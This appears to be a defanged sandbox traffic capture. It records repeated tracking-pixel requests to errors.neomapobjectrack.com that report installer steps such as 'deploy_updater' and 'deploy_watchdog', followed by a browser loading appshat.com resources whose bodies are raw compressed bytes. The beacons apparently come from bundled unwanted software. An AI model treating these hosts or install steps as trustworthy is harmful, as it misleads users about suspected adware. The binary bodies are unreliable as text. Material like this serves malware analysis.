Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: aMSNCjlO1zkVncOu56xBuyQbGqYV0sPXhtGzHmvAHj 38RBZIK3qBHyBIwBLA4Yf
x-amz-request-id: 5F4520922DD0BFF3
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: JUCnr9E2YLwu9pZ5gfn/djtM8SQpCEg8Tqz0FQLNyfpufypdMGCyvJlFkZLTgfjV
x-amz-request-id: F9872CEFF9FEB1B3
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: SiJ2qKtR8R ZbCIIWU007tL6G2z37teIYmsfkAxfEJGxrQCjr4A1oiZybUYR krl
x-amz-request-id: 4A3ED0F053B33443
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: SiJ2qK
tR8R ZbCIIWU007tL6G2z37teIYmsfkAxfEJGxrQCjr4A1oiZybUYR krl..x-amz-requ
est-id: 4A3ED0F053B33443..Date: Sat, 18 Apr 2015 23:35:55 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400159 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 8RH9nnyR1RQeCdurbxYX7wNh6Shp5af0RWgGeX2n 4FifrkJzpXI7FpfrBs/b0Y4
x-amz-request-id: D3D6983C5167C547
Date: Sat, 18 Apr 2015 23:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400159 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 0us0b0mX60VQ5I74xnmWCmxpwN/MvUhQI2qm4wql4uqGEW3OSs6KlFIl5tjeoVxD
x-amz-request-id: 9163E5A6872F688B
Date: Sat, 18 Apr 2015 23:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400159 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: fpg5cUa4bsAXjmKtypr8HQ9DMGvqQlUsUV4yqIBrXq7gz 2AOYhFUUeBbr1tje0M
x-amz-request-id: 8CE77CE51DFCE1CC
Date: Sat, 18 Apr 2015 23:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: fpg5cU
a4bsAXjmKtypr8HQ9DMGvqQlUsUV4yqIBrXq7gz 2AOYhFUUeBbr1tje0M..x-amz-requ
est-id: 8CE77CE51DFCE1CC..Date: Sat, 18 Apr 2015 23:36:00 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400161 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: VyHb7sIIYTpgwnml5Hc0EgELOtneyNOOpWIbdqIT3AiBd6SYI5o24UPuPYOA5DOw
x-amz-request-id: D6A240D9EBAC469E
Date: Sat, 18 Apr 2015 23:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000171&i=10000&n=deploy_end_funnel_step_name&rnd=1429400161 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: AeWwysiWxeT9Lstg6zbDzB9AzrsyAXpQQx0rIe3oi1yWWRQiNbcHI6zTEsPM8N3L
x-amz-request-id: 215F45DC0E9D403D
Date: Sat, 18 Apr 2015 23:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: AeWwys
iWxeT9Lstg6zbDzB9AzrsyAXpQQx0rIe3oi1yWWRQiNbcHI6zTEsPM8N3L..x-amz-requ
est-id: 215F45DC0E9D403D..Date: Sat, 18 Apr 2015 23:36:02 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..



GET /home HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: symfony=kr6rsneb04oodna0h6pcc568o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
17ba.............].r.Hz...hs.,;.p>...h...#..D[;..b5.....8.(Y....n..
\%..U*..H^!S...d'[email protected].!.l..../.v7IkM...MQ
..o._...{D.$.Oh..Y.G4...~..FY6y&.ggg..*..P.....\2..|..U....km|."....0J
...F.m.x...=.i4\o..E..6."...Q....0.N.(a..J.,?..T...0dt.....E7M...8....
..WH....4;.Y:b,[!.....d.}......YF..l..~.....M...l...-....[.s|...;.I...
i..Y-"Vg...ap......IJvh..~..d1.c.......g... %..a.qH"vF.....G.dB.,N.n..
.X....)....OYBFq.?...*q.lD..1B#..4.\.peAt.......x.gq....W....l.'.l....
.F..;.\...yN...E....![..]........V.P...%[email protected]....^...r|.......l~
m2.#P..98.N..J:..3..d..Q..X...)..V..f.4#.p.*X.%....#...&.y.xh....Q....
...y..........1."!.......5|..&I.M...M...Q....3....@U......."i..."}G._.
.....N*..q..sQ.LA)..c`.]..x!.S.......>K......i....K......O....8....
M.0....i...b..0......F...O..t5^..&.tu..7.. .r...F:..7.9.......<..O~
X..~.i.........[.......~.....d....d8.C..O.......?..r.f....t.z$ax.....$
~.:.v..C......}:.........S.............0..f..=&.Q...%.!..p..y....Y.y..
.....VW.........rkt..\.].{.b...<}.U9..>Y).XY% ..k.b..e.k2.P.L>
;...@..&e...L ..T.Oy...b.g....{.....S.x.-...x. . .....~.....w........u
...^.%..1.)V.......E.O..s..svW..r..b.......q......x..........`.".Jx7..
D.{:..<9..a..b..Y.U...t.....qr..>........... o....'G{.[..*..k...
.4.<..$..._...*...Le.....zt....K..P..A.M..`..c..X@]6.....a*:4.X"...
.X......J%]..g.....*S*KL.._55].qN....J..}.P..h..2.b|..._o....-....W@..
i.......B..3w...y-.L..M..}...OmC.mU.\.b.4\.1,.KA.fS/.Y.NY4.pi..?K&4..]
....A..Q.$.$_V..../........dI...IT.....7~2..g.l..rb. o......9.b..&
<<< skipped >>>

GET /css/main.css HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: text/css
Content-Length: 0
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-0"
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
....


GET /css/product.css HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: text/css
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Content-Encoding: gzip
221............}T.n. .}N...S^.Jnb'.*....K.......i.E..q.vp..HN....{..^.
..A.V_..V.q.TG...L..|...p....R.h/8........w..o.p.<....p......20..E.
!cX.C.......Z.|...........Ip.SR=m......Y."a......'.]...v`...-.....W^B.
]....Bl$..b..Wk...............M.w.2.^.. .g_0):......3D3.BfE&..>l).V
=....M...S.*......#&F]..."...L.2..T..|R{E"....'%W}.b.8.G....7.J..E-u..
.5k^;......_7b`..M-:....t.........Il@y...?.5Gqh.e^h5....L....%...Q)o.r
m0.=...anT>k......y#........\c.A...E.P..s..B......q..F.C...$...F..q
>.j=..."...gj4m..........w...... ;....K.(~r........8....vE....&....
....0......


GET /css/lightbox.css HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: text/css
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Content-Encoding: gzip
487.............WM..6...W...$..._k.h.o...$.6.....(.0%.$.]o...!)....|..
...E.g...7.....A..r]Ob)=F.........7zW.<..`....!TrI..E.p$9. ...*^...
w....}uh........R...!*..h.~..1....p!S.r. ...<U...[....1U..W.....>
;.uw.....%..................P .g..m......m........r0............%.....
..IqN..<f..&.e.}B......x.....p...l.$..H"hj .6. ........{:.)n.g&.*4.
W\.....-..7Y....q..D_.e..XrY.p((. ...>q. A.V.`*.....|_$N.......x...
.^9.!e...q....v..B.EF!u>.q....U....8.{...5.....W..7.....8!?[..N?q..
...........:.t.....%4.......T..<s.k.xR...[B.im.(..&.....y...`.R...r
.enB.B.L.b...=......G.$...Q.......@9h..J.IB.L..NE.....C.cH....m.W.o...
.........-G.....>.yy....5C.MX.......rk..bl...B_......51^..e.e.. .9.
xpW....k......E.T.M...}.'X..,x..j.%Y.'.|...'....y.<n....y.........]
}.....o....H...wA..z..h.8.[.......\7PK."..]'..C...M.-]J.....J.X..w..mq
...R..j.b.o..S{xB....e......E....... .. %.gG...........&..3-.^..4j.l..
t)..%(..C. .W....K%..P..6...t...p..Kej..oW#E=.*Y.=.\. ........v...s...
..p}K3B..03W{.._io.....]...>.*Q..~..Z..........62$..Pv&.<....!..
xm..l.....m'..vC3./b\.......%}...f.y;.v.Yry...}.r.#V..yTqf.!SIC31....b
.....v=..H.|..C.b.l0`\.v.f.uU..4......w....B.O^.....E..^H]d%.A..T?F..)
4........0......


GET /js/jquery.smooth-scroll.min.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Content-Encoding: gzip
51e.............Vao.6..._...!6,m..6H...-.a-.-......:I.iI........(9....
.....;...G._..y.........]Q....U...Y7....%.b...5|/...u.{.D.-....p.mxu.]
......7..w..Q......o/F.wE.X.43....**.]?@..*.|4B{ZI.k..&...L..._n<..
...?N....5....F_$...1e8.?<<..D...$..J.#p=.).f..2 Ov.ysl...ef.]..
...Y.4.4....i.oo.H.V`.*.$...BB0.....yJ...WK.......!p....ZS...k.1.,V.l6
.......G.......qpS.~d2U3.2{:.iU...v......r.un....x .s.7...pG.....aA..M
.....j..%......c.S...}....d.9.>QUm|k.!OMF0X`u....u4..zZp..M.....G"N
..6,..|18....b.!<L..3$.......r&..C ..l..'.........Y.:...O...L...h..
.k..Uz....C`..X..h...$H...b.....0Y..),.Y..\..8...._"...V...0..._..4..'
.....4.{gYQ....:x..]w~4......oD..r/x9.W.).........P8..:#........c..,8O
........6...&x.."u.C..E..U`..y2.1.....uD.X1U.. Ye..k..u....#........E.
...&.......icVVp....U= H...).:r..0<...j.oC.".....).mx..vxls.B.\...i
JU.0U1.c..`....?.../Rd;f:E..u1.%..'m......'.%.K$.R...N.jj......A_.H...
..a6._...].G'.L.u.....k..$Q..nJ..4Z...w....6{..2d........2......E...P.
.....D.?.}^...B?.. ...<.Ko......z."[email protected]!.#.&w.
.I...Ill...lI.>......:\-..\G............)^,L$.w.^..X.EW...... .....
hL..S....x.^b.j....].Ib........_9A.7DS...*..Vy...Y..=........\"..v..[.
...=T5.s.......'.?z"..]...|N}...K..._... l%.....?..[z..:1....{......p.
.6.?......pa.?...7...N.....=N.*6....0...O.?^...........W..=.gx.B...-..
..{.-......0......
<<< skipped >>>

GET /images/logo.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: image/jpeg
Content-Length: 5807
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-16af"
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......Exif..II*.................Ducky.......P..... hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp
MM:InstanceID="xmp.iid:B61A1BBFD29B11E28771DAFB2D1987AB" xmpMM:Documen
tID="xmp.did:B61A1BC0D29B11E28771DAFB2D1987AB"> <xmpMM:DerivedFr
om stRef:instanceID="xmp.iid:B61A1BBDD29B11E28771DAFB2D1987AB" stRef:d
ocumentID="xmp.did:B61A1BBED29B11E28771DAFB2D1987AB"/> </rdf:Des
cription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?
>....Adobe.d.......................................................
......................................................................
....................>..............................................
...................................................!1AQ"...2..aq..B#..
....Rr.3.SC.5.......................!..1Aa".Qq......2..B...b3$%.......
......?..u.......i...>#...-..LPv.....t..T.J..5........*jO....5UP...
t..O.h.nP*;.jOJu=?-.%(.%!.Ggh.H#@l. |..UN..~.....C...(e....YA!....8.).
[email protected].\.jY".......z.b;......6..7...M...6..X.&i..Tw.%... ...
..=.c.\$.1l....q;.*.).M..nij..;.....:........J...x..z.....5*......
<<< skipped >>>

GET /thumbnails/banner/images/assets/7/f/7fb9f4ca0fa96299334c18ee76c7b68b.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: image/jpeg
Content-Length: 43783
Last-Modified: Thu, 13 Jun 2013 18:07:09 GMT
Connection: keep-alive
ETag: "51ba0a4d-ab07"
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......JFIF.............`Exif..II*.......1.......&...i...............Pi
casa............0220..................................................
......................................................................
......................................................................
.........................d...........................!.1AQ.."aq.#2....
....$3BRSTbr........%Us.......4tu.....&Cc...6De..'7EVd................
.................J.........................."2..!1ABR.3Qaq....#4Sbr...
...C.....$..cs.....D............?...q.8.....@.[.....}...`.....<....
....< .....C..x.<...(`.<1...]p.k..\.......0.q..Qp...J....Qp.K
[email protected]..\8....0.x..... '.o...~7..&..S}B7...0......q.;
.K....@. ........V. ..`...`..............n.G..%du..K......|..t.oG.4...
C.:..;7.a|HV ....-q.;.....@; .....ew..^h..;"..1'.0'D.....{.j.S......G.
...,:...Rt....z...I=..../*.w....}...Ap.M....M...fg...#b.wo.IdP..^.@.'J
....'.....a.S....C..~LK..s.b;....."xb..$.....C..*..2F....es.'MB...=.G.
1S...3..J........5.......XX,.R.....*.cV.X.@>..fU.=A!w.Q...%.&....8.
....7...?%..j8..|..&...1.].V..I..Y."...Aw!T...1.ua..*..A...J.........C
.....N.G..v-..P..-..4.".x..Y.=........S>......g...5..A.@5-.,....%..
.}.\.........8sf.....4....AE.... ...AE.....LJ....\.A...0.C....E...p...
......I...I...*c_..jt........UZ..tC..GxS.!......4.|u-..C..(5.}......4$
W[.......].-.`...&...G..L..I.8.t...r....>.&!..K.........0Z.|.......
.0Z.|........0Z.|.......`..|............v/...< g......M3.'q.....J..
[email protected].)2B.][email protected]&...4k"E5
<<< skipped >>>

GET /thumbnails/banner/images/assets/1/f/1f8ffa22b53dfc2f6b7f1850bb6b73e8.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 173932
Last-Modified: Thu, 13 Jun 2013 17:00:48 GMT
Connection: keep-alive
ETag: "51b9fac0-2a76c"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR.............X.h.....sBIT.....O... .IDATx...w..G.8.^U.
...9h....%Y.ec..9c.1`...8L<8...w...3..q&...q..c.c.. ..........6....
.....LOOO.J ~..i>.....W..zU...0...{.N... .f........\.!S...9K.[..4_.
... ..D$N.O..}....'.\.QQSU..\Y..$.R....9.......@B........ .......a..zh
.._&.#..$.$_..[....W0.IB..........S...[..A..B0....B..........}.S.e.}..
....}..8...\c.D2...\[email protected]`*99.y....#1.lHa..k:.
........'..)....`n.e 2.f....S...........P..G?.zi.(..I........a.S...B..
<.....cID...a ......._.'.c....!g..=.R.....i.J....:[email protected]
5.Y[gG}....J...i..\p......y8....(.Qg.H...3x.....OD..x,..Ec.h$.....h\I.
..).....$......D,...D(.@%. ."..f..e...t9.^...r..^...qI.D........T....R
.."I..lvrz....h...P;.8.........pa...B...4strL.L.".us.i...0...}F.B.....
.......\... D.#...?Uf..M.9.......Y.e.6.F...K..D..U..;wr..-RM..M..P'...
..=...'..._|........315.,..nH..6...s.....A^.y.%.\.:._J.R.Lb6...9Y....&
lt;...Y.9......*.....  ..U&N.U.....^.R..dQmC....TUcL.9...!.a.J)..T5...
..........@4.@!.v{..].......|^...r.....!..$I._I.V...7..jBpMc..TU....h4
............?..D...!...........}^..f...g...T.4.Pb...X|lp....=.... ..7.
.......A._0k~.......B7..9>M.......uV........sl....kc.X.......U...,.
uS..QR..B9A."M...........o..?....*/D.S).D......., .Hyz.|X.9A .yI.t...0
?..{...e`2...$j.....Tb...b.9.)....v..X.$....8;...}.h.`[email protected]
..T..H(%...F..f.F.......ER[QVW[UW_S^^RT\T\T$I.....s..O .iVla...S=.`..)
A"@0...P.....................,.....,..ym.....0...!.M........u..G.Vy.]f
o[.2..Ad..l...p..6'fj..a..L.3..T...:.....2..k/.o....Y..p.7,..&Rczd
<<< skipped >>>

GET /images/5.0stars.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/jpeg
Content-Length: 2286
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-8ee"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......Exif..II*.................Ducky.......P..... hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="
hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.a
dobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E712C81ACD1411E29568FF5E7
C4F2C36" xmpMM:InstanceID="xmp.iid:E712C819CD1411E29568FF5E7C4F2C36" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFr
om stRef:instanceID="xmp.iid:D2ECCA94C82C11E2B97E98D68EE09333" stRef:d
ocumentID="xmp.did:D2ECCA95C82C11E2B97E98D68EE09333"/> </rdf:Des
cription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?
>....Adobe.d.......................................................
......................................................................
......................9...............................................
.....................................!..."..12BA&Qq.b3c...............
......!...1A..a2....Q"B%q.R.#.b.$..............?....3s....b.v..Q@...\g
.F^.v.G.`$.*.yAiX.........?o.%<........OST.n.m...:?.Q.W2EF*"".....F
./.....w.tl.!..=..I-J.U^J.R.Y...y.j.B.}Z"_S..0.~..xT.f.Q..W"x.:...X>
;.O/../.%zO.......f.~x*.O..D.$X....w..ZJ..o)'.Kq.|.E..Qr.T2bPu..1..x?N
j...!59.yK...B"[email protected].$.u..dI&..Vg..2.$..&'..X..\<.....h....
<<< skipped >>>

GET /thumbnails/icon/images/assets/f/4/f4e4b853ddab3b763f0af17d513631bd.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 309779
Last-Modified: Thu, 13 Jun 2013 17:05:34 GMT
Connection: keep-alive
ETag: "51b9fbde-4ba13"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......pHYs...#...#.x.?v...OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
